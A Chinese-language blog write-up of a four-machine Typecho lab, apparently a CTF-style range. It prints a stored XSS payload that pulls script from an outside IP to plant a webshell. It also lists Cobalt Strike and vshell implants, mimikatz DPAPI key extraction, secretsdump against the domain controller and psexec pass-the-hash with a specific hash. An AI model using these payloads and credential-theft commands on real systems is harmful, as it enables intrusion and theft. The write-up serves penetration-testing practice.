Typecho靶场四台设备

第一台

评论提交的地方发现有xss漏洞

尝试闭合并且构造xss的攻击代码

后台处理评论的时候,发现弹窗存在

之后构造恶意的js,对web的页面进行修改

至此 payload为

https://www.baidu.com/"/><script/src=//32.105.24.180/exp.js></script><div/"

去后台触发一下

之后再去看看eda.php

蚁剑连接成功

蚁剑连接成功

找到了第一个flag

第二台

fscan扫描扫出来个内⽹ip和端⼝,192.168.184.171:3306

在控制台外观找到可以写入木马的文件保存

发现了第二台机器的3306开启且发现密码

然后搭建隧道

连接成功

之后直接

用cs的txt

cs上线成功

桌面发现找到第二个flag

上线一下vshell

第三台

上线后直接port scan发现第三台主机,10.10.20.129的3306端⼝,就去收集⼀下凭据

拿guid去找masterkey:mimikatz sekurlsa::dpapi

然后去爆破⼀下密码 去远程⼀下3389去上传码⼦码⼦⽤中继监听去⽣成

远程连接到第三台

将exe文件导入使用上线成功

第四台

hostname去看下他的主机id: hostname:19client

ipconfig /all发现他的域名为:DNS:0x7e.labs所以证明他是⼀个域内机器

whoami /all发现他是⼀个⼯作组⽤户:

19client\administrator 通过信息收集发现是⼯作组打域,就直接尝试了下滞空哈希(上⾯fscan发现域控的机器名为:19DC)

shell secretsdump.exe -no-pass 0x7e.labs/19DC$@10.10.30.128去拿hash

psexec -hashes :0b7f5948117f3728fb173d8fb2b85b4b 0x7e.labs/administrator@1 0.10.30.128

挂双层代理

用小红帽加入命令行exe

得到第四个flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值